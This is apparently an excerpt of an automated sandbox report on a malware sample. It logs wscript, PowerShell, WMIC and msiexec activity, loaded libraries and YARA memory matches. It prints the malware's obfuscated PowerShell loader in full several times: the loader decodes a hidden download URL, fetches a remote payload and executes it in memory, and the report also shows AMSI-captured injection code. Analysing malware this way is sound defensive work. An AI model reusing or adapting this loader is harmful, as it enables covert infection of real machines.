                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7108
                Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. 
Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptnet.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cabinet.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: firewallapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: fwbase.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: fwpolicyiomgr.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2411838712.0000000007685000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: indows\System.Core.pdbui source: powershell.exe, 00000006.00000002.2411838712.0000000007685000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Windows\System32\wscript.exe  Anti Malware Scan Interface: .Run("powershell " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykker", "Unsupported parameter type 00000000")
                Source: Yara match  File source: 00000006.00000002.2420398899.000000000BB20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000006.00000002.2420231333.0000000008AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000006.00000002.2405265854.0000000005D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match  File source: 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: FromBase64String($stokesia)$glObal:SPkKEDe = [SysTem.texT.EnCODinG]::ASciI.GetStrINg($SENgenE)$GLOBaL:MulTibirtH=$spkKede.sUbsTrING($koNtoraSsiSTENtenS153,$FEjldIsponeRES)<#Borgerhusenes Engenderment
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: GetDelegateForFunctionPointer((Retransmissive $Tape $Gildningen), (Ekstravagerer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Outpresses = [AppDomain]::CurrentDomain.GetAssemblies()$g
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Garboils)), $Drivgarnsfiskerierseetroot).DefineDynamicModule($Turnxw202, $false).DefineType($villigstes, $cyphellae, [System.Multicast
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: FromBase64String($stokesia)$glObal:SPkKEDe = [SysTem.texT.EnCODinG]::ASciI.GetStrINg($SENgenE)$GLOBaL:MulTibirtH=$spkKede.sUbsTrING($koNtoraSsiSTENtenS153,$FEjldIsponeRES)<#Borgerhusenes Engenderment
                Source: C:\Windows\System32\wscript.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. 
